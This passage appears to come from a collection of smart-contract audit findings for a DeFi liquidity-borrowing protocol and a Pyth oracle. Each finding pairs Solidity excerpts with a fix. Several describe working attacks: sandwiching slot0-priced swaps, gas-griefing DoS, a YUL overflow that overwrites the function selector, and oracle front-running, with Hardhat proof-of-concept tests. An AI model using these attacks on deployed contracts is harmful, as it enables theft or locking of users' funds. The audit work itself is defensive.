Although the swap does not significantly impact a strongly founded pool, it does result in a loss of a few dollars for the repayer.\\n```\\n let amountWBTC = ethers.utils.parseUnits("0.05", 8); //token0\\n const deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\nlet params = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\nawait borrowingManager.connect(bob).borrow(params, deadline);\\n\\nconst borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n const swapParamsRep: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n \\n amountWBTC = ethers.utils.parseUnits("0.06", 8); //token0\\n\\nlet swapping: ISwapRouter.ExactInputSingleParamsStruct = {\\n tokenIn: WBTC_ADDRESS,\\n tokenOut: WETH_ADDRESS,\\n fee: 500,\\n recipient: alice.address,\\n deadline: deadline,\\n amountIn: ethers.utils.parseUnits("100", 8),\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n };\\n await router.connect(alice).exactInputSingle(swapping);\\n console.log("Swap success");\\n\\n let paramsRep: LiquidityBorrowingManager.RepayParamsStruct = {\\n isEmergency: false,\\n internalSwapPoolfee: 500,\\n externalSwap: swapParamsRep,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 990, //<=slippage simulated\\n };\\n await borrowingManager.connect(bob).repay(paramsRep, deadline);\\n // Without swap\\n// Balance of hold token after 
repay: BigNumber { value: "993951415" }\\n// Balance of sale token after repay: BigNumber { value: "99005137946252426108" }\\n// When swap\\n// Balance of hold token after repay: BigNumber { value: "993951415" }\\n// Balance of sale token after repay: BigNumber { value: "99000233164653177505" }\\n```\\n\\nThe following table shows the difference in received sale token:\\nSwap before repay transaction Token Balance of user after Repay\\nNo WETH 99005137946252426108\\nYes WETH 99000233164653177505\\nThe difference in the profit after repayment is 4904781599248603 wei, worth around 8 USD at the current market price. The profit loss will depend on the liquidity in the pool, which depends on the type of pool and related tokens.
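The tautology can be shown with a toy model (not the contract code; prices and amounts are illustrative): when `amountOutMinimum` is derived from the already-manipulated spot quote, the minimum-out check always passes, so a sandwich only shrinks the repayer's proceeds.

```python
BPS = 1000

def quote(amount_in, spot_price):
    # stand-in for QuoterV2 quoting at the current slot0 price
    return amount_in * spot_price

def repay_swap(amount_in, spot_price, slippage_bp1000=990):
    quoted = quote(amount_in, spot_price)
    # mirrors: amountOutMinimum = saleTokenAmountOut * slippageBP1000 / BPS,
    # computed AFTER any manipulation has already moved the spot price
    amount_out_min = quoted * slippage_bp1000 // BPS
    received = quoted                       # the swap fills at the same price
    assert received >= amount_out_min       # tautologically satisfied
    return received

honest = repay_swap(100, spot_price=20)     # fair price
sandwiched = repay_swap(100, spot_price=19) # attacker moved slot0 first
assert sandwiched < honest                  # repayer silently eats the difference
```

An externally supplied, pre-computed `amountOutMinimum` (or a TWAP-derived quote, per the recommendation) would make the sandwiched call revert instead of silently filling.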
To address this issue, avoid relying on slot0 and instead utilize Uniswap TWAP. Additionally, consider manually setting values for amountOutMin for swaps based on data acquired before repayment.
The absence of slippage protection results in potential profit loss for the repayer.
```\\n function _getCurrentSqrtPriceX96(\\n bool zeroForA,\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n ) private view returns (uint160 sqrtPriceX96) {\\n if (!zeroForA) {\\n (tokenA, tokenB) = (tokenB, tokenA);\\n }\\n address poolAddress = computePoolAddress(tokenA, tokenB, fee);\\n (sqrtPriceX96, , , , , , ) = IUniswapV3Pool(poolAddress).slot0(); //@audit-issue can be easily manipulated\\n }\\n```\\n
DoS of lenders and gas griefing by packing tokenIdToBorrowingKeys arrays
medium
`LiquidityBorrowingManager.borrow()` calls the function `_addKeysAndLoansInfo()`, which adds user keys to the `tokenIdToBorrowingKeys` array of the borrowed-from LP position:\\n```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n\\nA user key is calculated in the `Keys` library like so:\\n```\\n function computeBorrowingKey(\\n address borrower,\\n address saleToken,\\n address holdToken\\n ) internal pure returns (bytes32) {\\n return keccak256(abi.encodePacked(borrower, saleToken, holdToken));\\n }\\n```\\n\\n```\\n function addKeyIfNotExists(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n return;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n self.push(key);\\n }\\n\\n function removeKey(bytes32[] storage self, bytes32 key) internal {\\n uint256 length = self.length;\\n for (uint256 i; i < length; ) {\\n if (self.unsafeAccess(i).value == key) {\\n self.unsafeAccess(i).value = self.unsafeAccess(length - 1).value;\\n self.pop();\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nLet's give an example to see the potential impact and cost of the attack:\\nAn LP 
provider authorizes the contract to give loans from their large position. Let's say USDC/WETH pool.\\nThe attacker sees this and takes out minimum borrows of USDC using different addresses to pack the position's `tokenIdToBorrowingKeys` array. In `Constants.sol`, `MINIMUM_BORROWED_AMOUNT = 100000`, so the minimum borrow is $0.10 since USDC has 6 decimal places. Add this to the estimated gas cost of the borrow transaction, let's say $3.90. The cost to add one key to the array is approx. $4. The max block gas limit on Ethereum mainnet is `30,000,000`; dividing that by 2,000 gas, the approximate gas increase per key added to the array, gives 15,000. The attacker can therefore spend $60,000 to make any new borrows from the LP position unable to be repaid, transferred, or liquidated. Any new borrow will be stuck in the contract.\\nThe attacker now takes out a high-leverage borrow on the LP position, for example $20,000 in collateral for a $1,000,000 borrow. The attacker's total expenditure is now $80,000, and the $1,000,000 from the LP is now locked in the contract for an arbitrary period of time.\\nThe attacker calls `increaseCollateralBalance()` on all of the spam positions. The default daily rate is 0.1% (max 1%), so over a year the attacker must pay 36.5% of each spam borrow amount to avoid liquidation and shortening of the array. If the gas cost of increasing collateral is $0.50, and the attacker spends another $0.50 to increase collateral for each spam borrow, then the attacker can spend $1 on each spam borrow and keep them safe from liquidation for over 10 years for a cost of $15,000. The total attack expenditure is now $95,000. The protocol cannot easily increase the rate to hurt the attacker, because that would increase the rate for all users in the USDC/WETH market. Furthermore, the cost of the attack will not increase that much even if the daily rate is increased to the max of 1%. 
The attacker does not need to increase the collateral balance of the $1,000,000 borrow since repaying that borrow is DoSed.\\nThe result is that $1,000,000 of the lender's liquidity is locked in the contract for over 10 years for an attack cost of $95,000.
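A back-of-envelope check of the figures used in the example above; the per-key gas cost and dollar amounts are the report's assumptions, not measured values.

```python
block_gas_limit = 30_000_000
gas_per_key = 2_000                  # assumed cost added per array key iterated
keys_to_fill_block = block_gas_limit // gas_per_key
assert keys_to_fill_block == 15_000  # spam borrows needed to hit the gas limit

cost_per_spam_borrow = 4             # $0.10 minimum borrow + ~$3.90 gas
packing_cost = keys_to_fill_block * cost_per_spam_borrow
assert packing_cost == 60_000        # dollars to DoS repay/transfer/liquidate

leveraged_collateral = 20_000        # collateral on the $1,000,000 borrow
keep_alive_cost = 15_000             # ~$1/borrow to top up collateral for 10y+
total = packing_cost + leveraged_collateral + keep_alive_cost
assert total == 95_000               # locks $1,000,000 of LP liquidity
```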
`tokenIdToBorrowingKeys` tracks borrowing keys and is used in view functions to return info (getLenderCreditsCount() and getLenderCreditsInfo()). This functionality is easier to implement with arrays, but it can be done with mappings to reduce gas costs and prevent gas griefing and DoS attacks. For example the protocol can emit the borrows for all LP tokens and keep track of them offchain, and pass borrow IDs in an array to a view function to look them up in the mapping. Alternatively, OpenZeppelin's EnumerableSet library could be used to replace the array and keep track of all the borrows on-chain.
Array packing causes users to spend more gas on loans of the affected LP token. User transactions may revert with out-of-gas errors due to increased gas costs. An attacker can lock liquidity from LPs in the contract for arbitrary periods of time at an asymmetric cost favoring the attacker. The LP will earn very little in fees over the period of the DoS.
```\\n function _addKeysAndLoansInfo(\\n bool update,\\n bytes32 borrowingKey,\\n LoanInfo[] memory sourceLoans\\n ) private {\\n // Get the storage reference to the loans array for the borrowing key\\n LoanInfo[] storage loans = loansInfo[borrowingKey];\\n // Iterate through the sourceLoans array\\n for (uint256 i; i < sourceLoans.length; ) {\\n // Get the current loan from the sourceLoans array\\n LoanInfo memory loan = sourceLoans[i];\\n // Get the storage reference to the tokenIdLoansKeys array for the loan's token ID\\n bytes32[] storage tokenIdLoansKeys = tokenIdToBorrowingKeys[loan.tokenId];\\n // Conditionally add or push the borrowing key to the tokenIdLoansKeys array based on the 'update' flag\\n update\\n ? tokenIdLoansKeys.addKeyIfNotExists(borrowingKey)\\n : tokenIdLoansKeys.push(borrowingKey);\\n // rest of code\\n```\\n
Adversary can overwrite function selector in _patchAmountAndCall due to inline assembly's lack of overflow protection
medium
`The use of YUL or inline assembly in a solidity smart contract also makes integer overflow/ underflow possible even if the compiler version of solidity is 0.8. In YUL programming language, integer underflow & overflow is possible in the same way as Solidity and it does not check automatically for it as YUL is a low-level language that is mostly used for making the code more optimized, which does this by omitting many opcodes. Because of its low-level nature, YUL does not perform many security checks therefore it is recommended to use as little of it as possible in your smart contracts.`\\nSource\\nInline assembly lacks overflow/underflow protections, which opens the possibility of this exploit.\\nExternalCall.sol#L27-L38\\n```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n\\nIn the code above we see that `swapAmountInDataValue` is stored at `ptr + 36 (0x24) + swapAmountInDataIndex * 32 (0x20)`. The addition of 36 (0x24) in this scenario should prevent the function selector from being overwritten because of the extra 4 bytes (using 36 instead of 32). This is not the case though, because `mul(swapAmountInDataIndex, 0x20)` can overflow since it is a uint256. This allows the attacker to target any part of memory they choose by selectively overflowing to make the write land at the desired position.\\nAs shown above, overwriting the function selector is possible, although most of the time this value would be complete nonsense since swapAmountInDataValue is calculated elsewhere and isn't user supplied. This also has a workaround. By creating their own token and adding it as LP to a UniV3 pool, swapAmountInDataValue can be carefully manipulated to any value. 
This allows the attacker to selectively overwrite the function selector with any value they choose. This bypasses function selector restrictions and opens calls to dangerous functions.
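The wraparound can be checked with exact modular arithmetic. The `ptr` value below is an illustrative free-memory-pointer location; the mod-2**256 math mirrors how YUL's `mul` and `add` wrap silently.

```python
U256 = 2**256

ptr = 0x80                      # where calldata (selector first) sits in memory
index = 2**251 - 2              # attacker-chosen swapAmountInDataIndex
offset = (index * 0x20) % U256  # YUL mul wraps modulo 2**256
write_at = (ptr + 0x24 + offset) % U256

assert offset == U256 - 0x40    # (2**251 - 2) * 32 == 2**256 - 64
# the 32-byte mstore at write_at spans write_at .. write_at+31,
# which covers ptr .. ptr+3: exactly the 4-byte function selector
assert write_at == ptr - 0x1c
assert write_at <= ptr < write_at + 32
```

So despite the +0x24 offset that was meant to skip past the selector, a single overflowing index walks the write position back onto it.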
Limit `swapAmountInDataIndex` to a reasonable value such as uint128.max, preventing any overflow.
Attacker can bypass function restrictions and call dangerous/unintended functions
```\\n if gt(swapAmountInDataValue, 0) {\\n mstore(add(add(ptr, 0x24), mul(swapAmountInDataIndex, 0x20)), swapAmountInDataValue)\\n }\\n success := call(\\n maxGas,\\n target,\\n 0, //value\\n ptr, //Inputs are stored at location ptr\\n data.length,\\n 0,\\n 0\\n )\\n```\\n
Blacklisted creditor can block all repayment besides emergency closure
medium
```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n\\nThe code above is executed for each loan when attempting to repay. Here we see that each creditor is directly transferred their tokens from the vault. If the creditor is blacklisted for holdToken, then the transfer will revert. This will cause all repayments to revert, preventing the user from ever repaying their loan and forcing them to default.
Create an escrow to hold funds in the event that the creditor cannot receive them. Implement a try-catch block around the transfer to the creditor. If it fails, send the funds to an escrow account instead, allowing the creditor to claim their tokens later and the transaction to complete.
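A minimal sketch of that escrow fallback (a toy model, not the contract code; the blacklist and names are illustrative):

```python
blacklist = {"badCreditor"}   # addresses the token refuses to transfer to
escrow = {}                   # creditor -> claimable amount

def token_transfer(to, amount):
    # stand-in for a token (e.g. USDC-style) that reverts on blacklisted receivers
    if to in blacklist:
        raise RuntimeError("blacklisted")
    return amount             # delivered

def pay_creditor(creditor, amount):
    try:
        token_transfer(creditor, amount)                     # normal direct payout
    except RuntimeError:
        escrow[creditor] = escrow.get(creditor, 0) + amount  # claimable later

pay_creditor("goodCreditor", 100)   # direct payout succeeds
pay_creditor("badCreditor", 100)    # repayment still completes instead of reverting
assert escrow == {"badCreditor": 100}
```

The key property is that the borrower's repayment no longer depends on every creditor being able to receive tokens at that moment.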
Borrowers with blacklisted creditors are forced to default
```\\n address creditor = underlyingPositionManager.ownerOf(loan.tokenId);\\n // Increase liquidity and transfer liquidity owner reward\\n _increaseLiquidity(cache.saleToken, cache.holdToken, loan, amount0, amount1);\\n uint256 liquidityOwnerReward = FullMath.mulDiv(\\n params.totalfeesOwed,\\n cache.holdTokenDebt,\\n params.totalBorrowedAmount\\n ) / Constants.COLLATERAL_BALANCE_PRECISION;\\n\\n Vault(VAULT_ADDRESS).transferToken(cache.holdToken, creditor, liquidityOwnerReward);\\n```\\n
Incorrect calculations of borrowingCollateral leads to DoS for positions in the current tick range due to underflow
medium
This calculation is likely to underflow:\\n```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n\\n`cache.borrowedAmount` is the calculated amount of holdTokens based on the liquidity of a position. `cache.holdTokenBalance` is the balance of holdTokens queried after liquidity extraction and the tokens are transferred to the `LiquidityBorrowingManager`. If any amounts of the saleToken are transferred as well, these are swapped to holdTokens and added to `cache.holdTokenBalance`.\\nSo when the liquidity of a position is in the current tick range, both tokens are transferred to the contract and the saleToken is swapped for holdToken and then added to `cache.holdTokenBalance`. This makes `cache.holdTokenBalance > cache.borrowedAmount`, since `cache.holdTokenBalance == cache.borrowedAmount + amount of sale token swapped`, and makes the tx revert due to underflow.
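The revert can be sketched numerically; Solidity 0.8's checked subtraction is modeled here with an assert, and the amounts are illustrative.

```python
def checked_sub(a, b):
    # models Solidity 0.8 checked arithmetic: underflow reverts the tx
    assert a >= b, "underflow: tx reverts"
    return a - b

borrowed_amount = 1_000
# in-range position: balance = borrowedAmount + swapped saleToken proceeds
hold_token_balance = 1_000 + 50

try:
    checked_sub(borrowed_amount, hold_token_balance)   # current code order
    reverted = False
except AssertionError:
    reverted = True
assert reverted                                        # borrow() always reverts

collateral = checked_sub(hold_token_balance, borrowed_amount)  # swapped order
assert collateral == 50
```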
The borrowedAmount should be subtracted from holdTokenBalance\\n```\\nuint256 borrowingCollateral = cache.holdTokenBalance - cache.borrowedAmount;\\n```\\n
Many positions would be unavailable to borrowers. For non-volatile positions, such as those providing liquidity to stablecoin pools, the DoS could last for a very long period. For volatile positions that provide liquidity in a wide range, this could also last more than a year.
```\\nuint256 borrowingCollateral = cache.borrowedAmount - cache.holdTokenBalance;\\n```\\n
Wrong `accLoanRatePerSeconds` in `repay()` can lead to underflow
medium
Because the `repay()` function resets `dailyRateCollateralBalance` to 0 when the lender's call didn't fully close the position, we want to be able to compute the missing collateral again.\\nTo do so, we subtract the percentage of collateral not paid from the `accLoanRatePerSeconds`, so on the next call we will be adding extra seconds of fees that allow the contract to compute the missing collateral.\\nThe problem lies in the fact that we compute the percentage using the borrowed amount left instead of the initial borrowed amount, making the percentage higher. In practice this does allow the contract to recompute the missing collateral.\\nBut when the missing `collateralBalance` or `removedAmt` is very high (e.g. multiple days not paid, or the loan removed was most of the position's liquidity), we might end up with a percentage higher than the `accLoanRatePerSeconds`, which will cause an underflow.\\nIn case of an underflow the call will revert and the lender will not be able to get their tokens back.\\nConsider this POC that can be copied and pasted in the test files (replace all tests and just keep the setup & NFT creation):\\n```\\nit("Updated accRate is incorrect", async () => {\\n const amountWBTC = ethers.utils.parseUnits("0.05", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: 
swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n
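The underflow condition reduces to simple arithmetic. The sketch below is a toy model with illustrative numbers, not the contract's fixed-point math: dividing the unpaid-collateral delta by the remaining borrowed amount instead of the initial amount inflates the deduction past the accumulated rate.

```python
BP = 10_000   # basis-point scale, mirroring Constants.BP

def new_acc_rate(acc, missing_collateral, denominator):
    # mirrors: accLoanRatePerSeconds - mulDiv(|collateralBalance|, BP, denominator)
    delta = missing_collateral * BP // denominator
    assert acc >= delta, "underflow: emergency repay reverts"
    return acc - delta

acc = 2_000        # accrued rate units (illustrative)
missing = 90       # |collateralBalance| not paid
initial = 1_000    # borrowedAmount + removedAmt (the recommended denominator)
remaining = 100    # borrowed amount left after the emergency removal

assert new_acc_rate(acc, missing, initial) == 1_100   # initial amount: fine
try:
    new_acc_rate(acc, missing, remaining)  # 90 * 10000 / 100 = 9000 > 2000
    reverted = False
except AssertionError:
    reverted = True
assert reverted
```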
Consider that when a lender does an emergency liquidity restoration they give up their missing collateral, so use the initial amount in the computation instead of the borrowed amount left:\\n```\\nborrowingStorage.accLoanRatePerSeconds =\\n holdTokenRateInfo.accLoanRatePerSeconds -\\n FullMath.mulDiv(\\n uint256(-collateralBalance),\\n Constants.BP,\\n borrowing.borrowedAmount + removedAmt //old amount\\n );\\n```\\n
Medium. The lender might not be able to use `isEmergency` on `repay()` and will have to do a normal liquidation if they want their liquidity back.
```\\nit("Updated accRate is incorrect", async () => {\\n const amountWBTC = ethers.utils.parseUnits("0.05", 8); //token0\\n let deadline = (await time.latest()) + 60;\\n const minLeverageDesired = 50;\\n const maxCollateralWBTC = amountWBTC.div(minLeverageDesired);\\n\\n const loans = [\\n {\\n liquidity: nftpos[3].liquidity,\\n tokenId: nftpos[3].tokenId,\\n },\\n {\\n liquidity: nftpos[5].liquidity,\\n tokenId: nftpos[5].tokenId,\\n },\\n ];\\n\\n const swapParams: ApproveSwapAndPay.SwapParamsStruct = {\\n swapTarget: constants.AddressZero,\\n swapAmountInDataIndex: 0,\\n maxGasForCall: 0,\\n swapData: swapData,\\n };\\n\\n const borrowParams = {\\n internalSwapPoolfee: 500,\\n saleToken: WETH_ADDRESS,\\n holdToken: WBTC_ADDRESS,\\n minHoldTokenOut: amountWBTC,\\n maxCollateral: maxCollateralWBTC,\\n externalSwap: swapParams,\\n loans: loans,\\n };\\n\\n //borrow tokens\\n await borrowingManager.connect(bob).borrow(borrowParams, deadline);\\n\\n await time.increase(3600 * 72); //72h so 2 days of missing collateral\\n deadline = (await time.latest()) + 60;\\n\\n const borrowingKey = await borrowingManager.userBorrowingKeys(bob.address, 0);\\n\\n let repayParams = {\\n isEmergency: true,\\n internalSwapPoolfee: 0,\\n externalSwap: swapParams,\\n borrowingKey: borrowingKey,\\n swapSlippageBP1000: 0,\\n };\\n\\n const oldBorrowingInfo = await borrowingManager.borrowingsInfo(borrowingKey);\\n const dailyRateCollateral = await borrowingManager.checkDailyRateCollateral(borrowingKey);\\n\\n //Alice emergency repay but it reverts with 2 days of collateral missing\\n await expect(borrowingManager.connect(alice).repay(repayParams, deadline)).to.be.revertedWithPanic();\\n });\\n```\\n
Borrower collateral that they are owed can get stuck in the Vault and not be sent back to them after calling `repay`
medium
First, let's say that a borrower called `borrow` in `LiquidityBorrowingManager`. Then, they call `increaseCollateralBalance` with a large collateral amount. A short time later, they decide they want to repay, so they call `repay`.\\nIn `repay`, we have the following code:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nNotice that if we have `collateralBalance > 0` BUT `!((currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT)` (i.e. the first part of the if condition is fine but the second is not; it makes sense the second part is not fine, because the borrower is repaying not long after they borrowed, so fees haven't had a long time to accumulate), then we will still go to `currentFees = borrowing.dailyRateCollateralBalance;` but we will not do:\\n```\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n```\\n\\nHowever, later on in the code, we have:\\n```\\n Vault(VAULT_ADDRESS).transferToken(\\n borrowing.holdToken,\\n address(this),\\n borrowing.borrowedAmount + liquidationBonus\\n );\\n```\\n\\nSo, the borrower's collateral will actually not even be sent back to the LiquidityBorrowingManager from the Vault (since we never incremented liquidationBonus). We later do:\\n```\\n _pay(borrowing.holdToken, address(this), msg.sender, holdTokenBalance);\\n _pay(borrowing.saleToken, address(this), msg.sender, saleTokenBalance);\\n```\\n\\nSo clearly the user will not receive their collateral back.
You should separate:\\n```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n\\nInto two separate if statements. One should check if `collateralBalance > 0`, and if so, increment liquidationBonus. The other should check `(currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION > Constants.MINIMUM_AMOUNT` and if not, set `currentFees = borrowing.dailyRateCollateralBalance;`.
User's collateral will be stuck in Vault when it should be sent back to them. This could be a large amount of funds if for example `increaseCollateralBalance` is called first.
```\\n if (\\n collateralBalance > 0 &&\\n (currentFees + borrowing.feesOwed) / Constants.COLLATERAL_BALANCE_PRECISION >\\n Constants.MINIMUM_AMOUNT\\n ) {\\n liquidationBonus +=\\n uint256(collateralBalance) /\\n Constants.COLLATERAL_BALANCE_PRECISION;\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance;\\n }\\n```\\n
`commitRequested()` can be front-run by a malicious `commit()`, invalidating the oracle version
medium
Execution of the `commitRequested()` method restricts the `lastCommittedPublishTime` from going backward.\\n```\\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\\n public\\n payable\\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, "")\\n {\\n// rest of code\\n\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code\\n```\\n\\n`commit()` has a similar limitation and can set `lastCommittedPublishTime`.\\n```\\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\\n if (\\n versionList.length > versionIndex && // must be a requested version\\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\\n ) {\\n commitRequested(versionIndex, updateData);\\n return;\\n }\\n// rest of code\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code.\\n```\\n\\nThis leads to a situation where anyone can front-run `commitRequested()` and use his `updateData` to execute `commit()`. 
To satisfy the `commit()` constraints, the attacker passes a `commit()` parameter set as follows:\nversionIndex = nextVersionIndexToCommit\noracleVersion = versionList[versionIndex] - 1 and oracleVersion > _latestVersion\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION\nThis way `lastCommittedPublishTime` will be modified, causing the keeper's `commitRequested()` to `revert PythOracleNonIncreasingPublishTimes`.\nExample: Given: nextVersionIndexToCommit = 10, versionList[10] = 200\n_latestVersion = 100\nwhen:\nthe keeper executes commitRequested(versionIndex = 10, VAA{ publishTime = 205})\na front-runner executes `commit(versionIndex = 10, oracleVersion = 200-1, VAA{ publishTime = 205})`:\nversionIndex = nextVersionIndexToCommit (pass)\noracleVersion = versionList[versionIndex] - 1 and oracleVersion > _latestVersion (pass)\npythPrice.publishTime >= versionList[versionIndex] - 1 + MIN_VALID_TIME_AFTER_VERSION (pass)\nBy the time the keeper submits the next VAA, the price may have passed its expiration date.
Check whether `pythPrice` is valid for `nextVersionIndexToCommit`:\n```\n function commit(uint256 versionIndex, uint256 oracleVersion, bytes calldata updateData) external payable {\n // Must be before the next requested version to commit, if it exists\n // Otherwise, try to commit it as the next request version to commit\n if (\n versionList.length > versionIndex && // must be a requested version\n versionIndex >= nextVersionIndexToCommit && // must be the next (or later) requested version\n oracleVersion == versionList[versionIndex] // must be the corresponding timestamp\n ) {\n commitRequested(versionIndex, updateData);\n return;\n }\n\n PythStructs.Price memory pythPrice = _validateAndGetPrice(oracleVersion, updateData);\n\n // Price must be more recent than that of the most recently committed version\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\n lastCommittedPublishTime = pythPrice.publishTime;\n\n // Oracle version must be more recent than that of the most recently committed version\n uint256 minVersion = _latestVersion;\n uint256 maxVersion = versionList.length > versionIndex ? versionList[versionIndex] : current();\n\n if (versionIndex < nextVersionIndexToCommit) revert PythOracleVersionIndexTooLowError();\n if (versionIndex > nextVersionIndexToCommit && block.timestamp <= versionList[versionIndex - 1] + GRACE_PERIOD)\n revert PythOracleGracePeriodHasNotExpiredError();\n if (oracleVersion <= minVersion || oracleVersion >= maxVersion) revert PythOracleVersionOutsideRangeError();\n+ if (nextVersionIndexToCommit < versionList.length) {\n+ if (\n+ pythPrice.publishTime >= versionList[nextVersionIndexToCommit] + MIN_VALID_TIME_AFTER_VERSION &&\n+ pythPrice.publishTime <= versionList[nextVersionIndexToCommit] + MAX_VALID_TIME_AFTER_VERSION\n+ ) revert PythOracleUpdateValidForPreviousVersionError();\n+ }\n\n _recordPrice(oracleVersion, pythPrice);\n nextVersionIndexToCommit = versionIndex;\n _latestVersion = oracleVersion;\n }\n```\n
If a user can control when the oracle is invalidated, it can lead to many problems, e.g. invalidating the oracle to their own benefit (avoiding losses they should take) or maliciously destroying other users' profits.
```\\n function commitRequested(uint256 versionIndex, bytes calldata updateData)\\n public\\n payable\\n keep(KEEPER_REWARD_PREMIUM, KEEPER_BUFFER, updateData, "")\\n {\\n// rest of code\\n\\n if (pythPrice.publishTime <= lastCommittedPublishTime) revert PythOracleNonIncreasingPublishTimes();\\n lastCommittedPublishTime = pythPrice.publishTime;\\n// rest of code\\n```\\n
